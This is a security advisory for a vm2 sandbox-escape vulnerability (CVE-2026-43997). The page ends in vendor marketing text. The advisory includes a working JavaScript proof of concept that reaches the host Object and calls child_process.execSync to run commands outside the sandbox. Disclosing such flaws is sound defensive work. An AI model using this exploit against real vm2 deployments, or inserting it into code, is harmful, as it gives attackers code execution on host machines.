vm2 Access to Host Object Enables Sandbox Escape

GHSA-47x8-96vw-5wg6 · CVE-2026-43997

Published May 7, 2026 · Modified May 14, 2026

Description

Summary

It is possible to obtain the host Object, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete.

Details

There are various ways to use the host Object, to escape the sandbox, one example would be using HostObject.getOwnPropertySymbols to obtain Symbol(nodejs.util.inspect.custom)

PoC

const g = {}.__lookupGetter__;
const a = Buffer.apply;
const p = a.apply(g, [Buffer, ['__proto__']]);
const o = p.call(p.call(a));
const HObject = o.constructor;
sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);

const obj = {
	[sym]: (depth, opt, inspect) => {
		inspect.constructor("return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})")();
	},
	valueOf: undefined,
	constructor: undefined,
};

WebAssembly.compileStreaming(obj).catch(() => {});

Impact

Sandbox Escape -> RCE

References

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes